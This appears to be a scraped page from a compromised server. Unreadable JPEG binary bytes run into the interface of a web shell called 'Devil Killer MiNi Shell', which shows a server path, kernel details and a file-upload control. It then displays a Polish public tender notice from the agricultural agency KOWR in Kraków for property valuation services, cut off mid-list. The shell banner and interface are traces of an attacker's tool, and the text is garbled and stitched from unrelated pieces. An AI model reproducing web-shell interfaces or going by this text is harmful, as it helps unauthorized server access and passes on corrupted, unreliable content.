JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220218/0006232801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Świadczenie usług polegających na sporządzaniu operatów szacunkowych na potrzeby Krajowego Ośrodka Wsparcia Rolnictwa Oddział Terenowy <br/>w Krakowie”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Krajowy Ośrodek Wsparcia Rolnictwa</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Oddział Terenowy w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 367849538</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Zbożowa 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">30-002</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">12 424 09 40</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne.krakow@kowr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kowr.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - agencja wykonawcza</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Wdrażanie i stosowanie instrumentów wsparcia rolnictwa, aktywnej polityki rolnej oraz rozwoju obszarów wiejskich </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Świadczenie usług polegających na sporządzaniu operatów szacunkowych na potrzeby Krajowego Ośrodka Wsparcia Rolnictwa Oddział Terenowy <br/>w Krakowie”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2a8ce985-90b9-11ec-9bc1-c2db95d08897</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00062328</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00340404/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Wycena nieruchomości, usługa analiz i ekspertyz wycen majątkowych i ocen stanu technicznego nieruchomości położonych na terenie województwa małopolskiego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://kowr.eb2b.com.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu Zamawiający będzie się kontaktował z Wykonawcami przy użyciu środków komunikacji elektronicznej zgodnie z<br/>Rozporządzeniem w sprawie środków komunikacji elektronicznej za pośrednictwem Platformy zakupowej (https://kowr.eb2b.com.pl). Korespondencja elektroniczna prowadzona jest w języku polskim i powinna być sporządzona, wysyłana i odbierana zgodnie z wymaganiami technicznymi i organizacyjnymi zawartymi w Rozporządzeniu w sprawie środków komunikacji elektronicznej. Korespondencja w języku obcym powinna być przekazana wraz z tłumaczeniem na język polski. Opis sposobu rejestracji oraz czynności technicznych koniecznych do złożenia oferty lub innych dokumentów znajduje się w rozdziale XII SWZ przedmiotowego postępowania.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w Rozporządzeniach:<br/>- Rozporządzeniem Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 roku w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy;<br/>- Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 roku w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych<br/>oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie.<br/>Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy<br/>użyciu środków komunikacji elektronicznej wskazanej w SWZ.<br/>Dopuszczalne formaty przesyłanych danych to pliki o wielkości do 100 MB w txt, rtf, pdf ,xps, odt,<br/>ods,odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt,<br/>TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc. Zamawiający rekomenduje wykorzystanie formatów:<br/>.pdf<br/>.doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf. W celu ewentualnej kompresji danych<br/>Zamawiający rekomenduje wykorzystanie jednego z formatów .zip lub .7Z. Z uwagi na obowiązujące<br/>przepisy prawa pliki złożone w formatach .rar .gif .bmp .numbrs .pages. zostaną uznane za złożone<br/>nieskutecznie.<br/>Zamawiający określa następujące niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę<br/>na Platformie:<br/>- stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 2 mb/s;<br/>- komputer klasy PC lub PC lub MAC, o następującej konfiguracji: pamięć min. 4GB Ram, procesor<br/>Intel IV 4GHZ, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux lub ich nowsze<br/>wersje;<br/>- zainstalowana dowolna najnowsza wersja przeglądarki internetowej; w przypadku Internet Explorer<br/>minimalnie wersja 11.0;<br/>- włączona obsługa JavaScript;<br/>- zainstalowany program Acrobat Reader.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacja o przetwarzaniu danych osobowych:<br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27<br/>kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i<br/>w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej jako „RODO”,<br/>wszystkie osoby, które ubiegają się o udzielenie zamówienia/ złożyły ofertę.<br/>Szczegółowe informacje zawiera rozdział XXIV SWZ przedmiotowego postępowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">KRA.WOP.260.1.2022.BM</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Przedmiotem zamówienia jest wykonanie wycen określających wartość rynkową nieruchomości, wymienionych i opisanych szczegółowo w załączniku nr 2 do SWZ (formularz cenowy).<br/>2)	Przedmiot zamówienia obejmuje realizację usługi wyceny nieruchomości położonych na terenie całego województwa małopolskiego (usługi specjalne).<br/>3)	Usługę wyceny nieruchomości należy zrealizować zgodnie z aktualnie obowiązującymi przepisami prawa w zakresie wyceny nieruchomości, ze szczególnym uwzględnieniem przepisów ustawy z dnia 21 sierpnia 1997 roku o gospodarce nieruchomościami, Rozporządzenia Rady Ministrów z dnia 21 września 2004 roku w sprawie wyceny nieruchomości i sporządzania operatu oraz Powszechnymi Krajowymi Zasadami Wyceny opracowanymi przez Polską Federację Stowarzyszeń Rzeczoznawców Majątkowych.<br/>4)	W operatach szacunkowych, poza podaniem wartości ogółem, należy wyszczególnić osobno, w przypadku ich występowania:<br/>4.1. wartość gruntów rolnych/nierolnych; <br/>4.2. wartość gruntów zabudowanych;<br/>4.3. wartość gruntów pod zabudowę;<br/>4.4. wartość budynków i budowli oraz urządzeń przynależnych do nieruchomości;<br/> 4.5. wartość gruntów pod drogę;<br/>4.6. wartość drzewostanu;<br/>4.7. wartość nasadzeń;<br/>4.8. wartość maszyn i urządzeń;<br/>4.9. wartość budynków i budowli wraz z gruntem wpisanych do rejestru zabytków;<br/> 4.10. wartość złoża w granicach działki;<br/>4.11. wartość gruntu, na którym zlokalizowane jest złoże. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71319000-7 - Usługi biegłych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty Zamawiający będzie kierował się kryterium:<br/>Punkty oceny ofert zostaną przyznane według następujących wzorów: <br/><br/>Kryterium: Cena oferty brutto (Vxc) – 60 % <br/>Punkty za cenę zostaną przyznane wg następującego wzoru: <br/>Vxc = (Cn / Cx) x 60% x 100, gdzie: <br/>Vxc – ilość punktów za cenę brutto oferty badanej, <br/>Cn – cena brutto najniższej oferty niepodlegającej odrzuceniu, <br/>Cx – cena brutto oferty badanej. <br/><br/>Kryterium: Doświadczenie personelu w wykonaniu operatów szacunkowych określających wartość rynkową nieruchomości gruntowych rolnych i nierolnych (D) – 30 %<br/>[punkty zostaną przyznane wg poniższego kryterium dla każdej osoby skierowanej do wykonania operatów szacunkowych osobno . Maksymalna ilość punktów jaką można uzyskać wynosi 30 pkt]<br/><br/>Wykonanie 25 operatów szacunkowych określających wartość rynkową nieruchomości gruntowych rolnych i nierolnych – 0 pkt<br/>Wykonanie 26 - 45 operatów szacunkowych określających wartość rynkową nieruchomości gruntowych rolnych i nierolnych – 5 pkt<br/>Wykonanie 46 - 64 operatów szacunkowych określających wartość rynkową nieruchomości gruntowych rolnych i nierolnych – 10 pkt<br/>Wykonanie co najmniej 65 operatów szacunkowych określających wartość rynkową nieruchomości gruntowych rolnych i nierolnych – 15 pkt<br/><br/>W przypadku podania przez Wykonawcę ilości mniejszej niż 25 operatów szacunkowych w Wykazie osób oraz niewskazanie lub wskazanie tylko jednej (1) osoby skierowanej do realizacji zamówienia (załącznik nr 7 do SWZ) spowoduje, że Zamawiający odrzuci ofertę jako niezgodną z treścią specyfikacji warunków zamówienia (SWZ) na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp.<br/><br/><br/>Kryterium: Termin realizacji zamówienia (T) – 10 %<br/>[Wykonawca może uzyskać maksymalnie 10 pkt. Zaproponowany w Formularzu ofertowym termin realizacji zamówienia będzie podlegał ocenie w następujący sposób]:<br/><br/>Termin realizacji zamówienia 21 dni – 0 pkt <br/>Termin realizacji zamówienia 14 dni – 10 pkt<br/><br/>W przypadku podania przez Wykonawcę innego terminu niż 14 lub 21 dni spowoduje, że Zamawiający odrzuci ofertę jako niezgodną z treścią specyfikacji warunków zamówienia (SWZ) na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp, z zastrzeżeniem, że w przypadku, gdy Wykonawca nie wpisze terminu realizacji zamówienia (w formularzu ofertowym) lub wpisze inny termin niż wskazany przez Zamawiającego (14 lub 21 dnia) Zamawiający przyjmie, że zaoferował On najdłuższy termin realizacji zlecenia wykonania operatu szacunkowego.<br/><br/>Za najkorzystniejszą przyjmuje się ofertę końcową (CK) z ilością punktów wyliczoną wg wzoru:<br/>CK= Vxc + D + T<br/>gdzie:<br/><br/>Vxc - oznacza ilość uzyskanych punktów wg kryterium cena z dokładnością do dwóch miejsc po przecinku,<br/>D - oznacza ilość uzyskanych punktów - doświadczenie w wykonaniu operatów szacunkowych określających wartość rynkową nieruchomości gruntowych rolnych i nierolnych.<br/>T - oznacza ilość uzyskanych punktów – termin realizacji zamówienia.<br/><br/>3.	1% odpowiada w punktacji końcowej 1 pkt. Maksymalną liczbę punktów (100 pkt).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie personelu w wykonaniu operatów szacunkowych określających wartość rynkową nieruchomości gruntowych rolnych i nierolnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz którzy spełniają następujące warunki:<br/>1.1.	zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie stawia szczególnych wymagań w tym zakresie.<br/>1.2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów; <br/>Zamawiający nie stawia szczególnych wymagań w tym zakresie. <br/>1.3.	sytuacji ekonomicznej lub finansowej;<br/>Zamawiający nie stawia szczególnych wymagań w tym zakresie.<br/>1.4.	zdolności technicznej lub zawodowej. <br/>Niniejszy warunek zostanie uznany za spełniony, jeżeli Wykonawca: <br/>1.4.1.	wykaże należyte wykonanie co najmniej 50 operatów szacunkowych określających wartość rynkową nieruchomości gruntowych rolnych i nierolnych wykonanych nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie. Warunek zostanie uznany za spełniony wówczas, gdy Wykonawca wykaże należyte wykonanie 50 (słownie: pięćdziesięciu) operatów szacunkowych określających wartość rynkową nieruchomości gruntowych rolnych i nierolnych w ramach jednej lub kilku umów.<br/>1.4.2.	wykaże spełnienie wymagań w zakresie kwalifikacji personelu realizującego przedmiot zamówienia: dysponuje osobami skierowanymi do realizacji zamówienia publicznego, w szczególności odpowiedzialnymi za świadczenie usług, kontrolę jakości tj. dysponuje co najmniej 2 osobami, które posiadają wymagane prawem (przepisami Działu V Działalność zawodowa w dziedzinie gospodarowania nieruchomościami ustawy z dnia 21.08.1997r. o gospodarce nieruchomościami Dz.U.2020 poz. 65) uprawnienia w zakresie szacowania nieruchomości potwierdzone świadectwem nadania uprawnień oraz doświadczeniem zawodowym, to jest wykonały co najmniej 25 operatów szacunkowych określających wartość rynkową nieruchomości gruntowych rolnych i nierolnych.<br/>W przypadku zmiany osób wskazanych w ofercie w trakcie realizacji zamówienia, nowe osoby będą musiały spełniać w/w wymagania.<br/>1.4.3.	załączy dowody określające, czy usługi, o których mowa w pkt 1.4.1., zostały wykonane należycie, przy czym tymi dowodami są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty, <br/>1.4.4.	załączy dowody potwierdzające kwalifikacje personelu realizującego przedmiot zamówienia w zakresie kompetencji, o których mowa w pkt 1.4.2., przy czym tymi dowodami są właściwe świadectwa, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	W celu potwierdzenia braku podstaw do wykluczenia z postępowania Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona do złożenia w wyznaczonym terminie nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących dokumentów:<br/>1.1.	informacji z Krajowego Rejestru Karnego sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem w zakresie art. 108 ust. 1 pkt 1 i 2 ustawy Pzp; art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego;<br/>1.2.	oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. Wzór oświadczenia stanowi załącznik nr 5 do SWZ.;<br/>1.3.	zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>1.4.	zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>1.5.	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, 